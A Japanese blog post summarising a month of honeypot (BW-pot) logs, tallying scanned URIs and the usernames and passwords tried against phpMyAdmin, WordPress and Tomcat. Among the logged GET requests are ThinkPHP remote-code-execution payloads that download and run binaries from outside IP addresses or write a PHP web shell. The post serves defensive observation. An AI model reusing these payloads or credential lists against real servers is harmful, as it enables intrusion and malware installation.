2019年4月 BW-pot観察まとめ

1.トップ画面

f:id:NickShadows:20190519125906p:plain:w500


BW-potの運用を始めて、一ヶ月丸々運用したのは初めての月。
12400アクセスもいくんですね。

2.1ヶ月折れ線グラフ

f:id:NickShadows:20190519130105p:plain:w500


前半がピークの様子。
後半は惰性感がある。

3.GETリクエスト(トップ100)

no uri Co
1 / 4244
2 /manager/html 3291
3 /wp-login.php 128
4 /index.action 25
5 /TP/public/index.php 23
6 //a2billing/customer/templates/default/footer.tpl 21
7 /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 20
8 //recordings/ 20
9 //about.php 20
10 //admin/config.php 20
11 /phpMyAdmin/scripts/setup.php 16
12 /phpmyadmin/scripts/setup.php 15
13 /.env 15
14 /w00tw00t.at.blackhats.romanian.anti-sec:) 14
15 /pma/scripts/setup.php 14
16 /favicon.ico 13
17 /echo.php 12
18 //vtigercrm/vtigerservice.php 12
19 /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]= 'wget http[:]//185.244.25.131/x86 -O .Akari; chmod +x .Akari; rm -rf .Akari x86; history -c -w;exit;logout;' 11
20 /robots.txt 10
21 /sitemap.xml 9
22 /myadmin/scripts/setup.php 9
23 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=root123 9
24 /MyAdmin/scripts/setup.php 9
25 /mysql/admin/index.php?lang=en 8
26 /.well-known/security.txt 8
27 /colibri/conferences 8
28 /phpmyadmin/index.php?lang=en&pma_username=sql&pma_password=sql 8
29 /phpmyadmin/index.php?lang=en&pma_username=pma&pma_password=pma 8
30 /mysql/sqlmanager/index.php?lang=en 8
31 /mysql/mysqlmanager/index.php?lang=en 8
32 /w00tw00t.at.ISC.SANS.DFind:) 8
33 /phpmyadmin/index.php?lang=en 8
34 /latest/meta-data 8
35 /mysql/dbadmin/index.php?lang=en 8
36 /manager/html/ 8
37 /phpmyadmin/index.php?lang=en&pma_username=popa3d&pma_password=popa3d 8
38 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=password123 7
39 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=pass2019 7
40 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=user 7
41 /phpmy/scripts/setup.php 7
42 /script 7
43 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=p455w0rd 7
44 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=host 7
45 /phpmyadmin/index.php?lang=en&pma_username=admin&pma_password=root 7
46 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=trustno1 7
47 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=backupdb 7
48 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2020 7
49 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=webmaster 6
50 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=123 6
51 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=1234567890 6
52 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password= 6
53 /phpmyadmin/index.php?lang=en&pma_username=shopdb&pma_password=shopdb 6
54 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=666666 6
55 /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]=wget%20http[:]//81.6.42.123/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; 6
56 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=users 6
57 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=rootadmin 6
58 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=12345 6
59 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=confidential 6
60 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=123456789 6
61 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=db 6
62 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=databases 6
63 /phpmyadmin/index.php?lang=en&pma_username=admin&pma_password=admin 6
64 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=web 6
65 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=password2019 6
66 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=passw0rd 6
67 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2013 6
68 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=security 6
69 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=toor321 6
70 /HNAP1/ 6
71 /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php 6
72 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=linux 6
73 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=football 6
74 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=unix 5
75 /phpmyadmin/index.php?lang=en&pma_username=wordpress&pma_password=wordpress 5
76 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=dollars 5
77 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=qazwsx 5
78 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=123456 5
79 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=blog 5
80 /phpmyadmin/index.php?lang=en&pma_username=wordpress&pma_password=password 5
81 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=12qwaszx 5
82 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=4321 5
83 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=password1 5
84 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2014 5
85 /phpmyadmin/index.php?lang=en&pma_username=ueer&pma_password=pass 5
86 /phpmyadmin/index.php?lang=en&pma_username=blog&pma_password=blog 5
87 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=music 5
88 /phpmyadmin/index.php?lang=en&pma_username=admin&pma_password=123 5
89 /phpmyadmin/index.php?lang=en&pma_username=admin&pma_password=pass 5
90 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=321 5
91 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=root1234 5
92 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=54321 5
93 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=backupdbs 5
94 /struts2-rest-showcase/orders.xhtml 5
95 /index.do 5
96 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=test 5
97 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=ROOT 5
98 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=freedom 5
99 /phpmyadmin/index.php?lang=en&pma_username=apache&pma_password=apache 5
100 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=onetwothree 5


4.POSTリクエスト

no uri Co
1 /phpmyadmin/index.php 1038
2 /wp-login.php 123
3 /xmlrpc.php 121
4 /tmUnblock.cgi 47
5 /TP/public/index.php?s=captcha 18
6 /users?page=&size=5 11
7 /sdk 4
8 /invoker/readonly 4
9 /pk1914.php 1
10 /login.action 1
11 /Alarg53.php 1
12 /Skri.php 1
13 /GponForm/diag_Form?images/ 1
14 /xx.php 1
15 /qaq.php 1
16 /db_dataml.php 1
17 /sllolx.php 1
18 / 1
19 /lapan.php 1
20 /db.init.php 1
21 /db_desql.php 1
22 /db_session.init.php 1
23 /w.php 1
24 /p34ky1337.php 1
25 /xw1.php 1
26 /s.php 1
27 /wuwu11.php 1
28 /wc.php 1
29 /9678.php 1


5.pypmyadminユーザー

no user Co
1 root 1783
2 admin 23
3 wordpress 17
4 sql 8
5 popa3d 8
6 pma 8
7 shopdb 6
8 blog 5
9 shop 5
10 apache 5
11 ueer 5
12 joomla 4
13 db 4
14 nas 4
15 money 3
16 wp 3
17 dbs 2
18 http 2
19 project 2
20 nginx 2
21 web 1


6.pypmyadminパスワード(トップ100)

no pwd Co
1 pass 16
2 blog 14
3 root 13
4 admin 12
5 123 12
6 password 11
7 db 10
8 null 9
9 wordpress 9
10 root123 9
11 123456789 8
12 popa3d 8
13 football 8
14 pma 8
15 sql 8
16 shop 8
17 666666 7
18 2020 7
19 test 7
20 1234567890 7
21 trustno1 7
22 password123 7
23 dragon 7
24 host 7
25 backupdb 7
26 web 7
27 pass2019 7
28 123456 7
29 12345 7
30 p455w0rd 7
31 user 7
32 databases 6
33 12345678 6
34 users 6
35 webmaster 6
36 4321 6
37 qwerty 6
38 freedom 6
39 toor321 6
40 mysql 6
41 confidential 6
42 security 6
43 starwars 6
44 12qwaszx 6
45 password2019 6
46 2013 6
47 linux 6
48 rootadmin 6
49 shopdb 6
50 qazwsx 6
51 passw0rd 6
52 solo 5
53 onetwothree 5
54 password1 5
55 dbs 5
56 111111 5
57 monkey 5
58 backupdbs 5
59 password2018 5
60 administrator 5
61 dollars 5
62 queen 5
63 apache 5
64 ROOT 5
65 321 5
66 54321 5
67 2014 5
68 1234567 5
69 music 5
70 2016 5
71 test123 5
72 sunshine 5
73 123123 5
74 1234 5
75 unix 5
76 root1234 5
77 abc123 5
78 iloveyou 4
79 backups 4
80 toor123 4
81 login 4
82 whatever 4
83 webadmin 4
84 senha 4
85 a123456 4
86 gameserver 4
87 r00t 4
88 secure 4
89 aa123456 4
90 oracle 4
91 654321 4
92 nas 4
93 access 4
94 hello 4
95 joomla 4
96 xampp 4
97 toor 4
98 rock 4
99 acces 4
100 trump 4


7.wordpressユーザー

no user Co
1 117
2 admin1 2


8.wordpressパスワード

no pwd Co
1 1234 9
2 123456 9
3 123456789 6
4 12345 5
5 1234567 5
6 12345678 5
7 pass 4
8 admin1 4
9 password 4
10 1 4
11 123 4
12 [login] 4
13 admin123 3
14 60 2
15 1.23457E+19 2
16 adminadmin 2
17 [asDomaincom]123 2
18 12345qwe 2
19 1234567890 2
20 Admin 2
21 0 2
22 news 2
23 ADMIN 2
24 2 2
25 putun 2
26 @admin 2
27 admin 2
28 qwe 2
29 ADMIN1 2
30 administrator 2
31 [asDomaincom] 2
32 admin123456 2
33 52.14.60.236 2
34 ADMIN123 2
35 webadmin123 1
36 1qaz2wsx 1
37 qwertyui 1
38 123qwe 1
39 qwertyu 1
40 qazwsxedcrfvtgbyhnujmik,ol 1
41 qwertyuiop 1
42 poiuytrewq 1
43 1234567890qwertyuiop 1
44 webadmin 1
45 qwerty 1


9.tomcatユーザー

no user Co
1 tomcat 558
2 admin 553
3 manager 411
4 user 400
5 administrator 400
6 both 400
7 adminScript 363
8 root 148
9 49
10 password 1
11 scott 1


10.tomcatパスワード

no pwd Co
1 127
2 admin 119
3 tomcat 119
4 123456 107
5 12345 103
6 manager 86
7 password 77
8 12345678 76
9 1234567 76
10 123456789 76
11 123 76
12 1234 76
13 dragon 72
14 monkey 72
15 88888888 72
16 qwertyuiop 72
17 111111 72
18 888888 72
19 1234567890 72
20 654321 72
21 qwerty 72
22 1qaz2wsx 72
23 666666 72
24 abc123 72
25 s3cret 70
26 starwars 69
27 princess 69
28 admin888 69
29 letmein 69
30 master 69
31 admin123 69
32 baseball 69
33 passw0rd 69
34 solo 69
35 admin123!@# 69
36 welcome 69
37 football 69
38 login 69
39 gts@05 69
40 root 38
41 both 10
42 user 10
43 administrator 10
44 adminScript 10
45 tomcat123 3
46 121212 3
47 gwerty123 3
48 123123 3
49 789456123 3
50 password1 3
51 zxcvbnm 3
52 qwerty1 3
53 5201314 3
54 1 3
55 12345a 3
56 159753 3
57 admin1 3
58 333333 3
59 123qwe 3
60 root1 3
61 777777 3
62 112233 3
63 qazwsx 3
64 fuckyou 3
65 a123456 3
66 iloveyou 3
67 1q2w3e4r5t 3
68 jordan23 3
69 abcd1234 3
70 asdfgh 3
71 qwerty123 3
72 11111 3
73 11111111 3
74 123456a 3
75 aaaaaa 3
76 goodluck 3
77 0 3
78 tinkle 3
79 2580 3
80 999999 3
81 a12345 3
82 changethis 3
83 789456 3
84 good 3
85 123abc 3
86 1g2w3e4r 3
87 123123123 3
88 1q2w3e 3
89 apache 3
90 love123 3
91 qwe123 3
92 987654321 3
93 123456789a 3
94 1234qwer 3
95 123321 3
96 asdf 3
97 apache1 3
98 tomcat1 3
99 tomcat123456 3
100 555555 3
101 asd123 3
102 123654 3
103 222222 3
104 12qwaszx 3
105 7777777 3
106 1q2w3e4r 3
107 j5Brn9 1
108 tiger 1


11.まとめ

とにかくアクセス数が多かったな、という印象です。
また、調査ばかりでその後の攻撃はありませんでした。


パスワード試行は一部成功しているのですが、攻撃が続きません。
タスクかなんか組んで放置しているのでしょうか。


4月後半はアクセスが少なかったので、この期間で集計して準備している可能性もありますね。
5~6月は注意が必要かもです。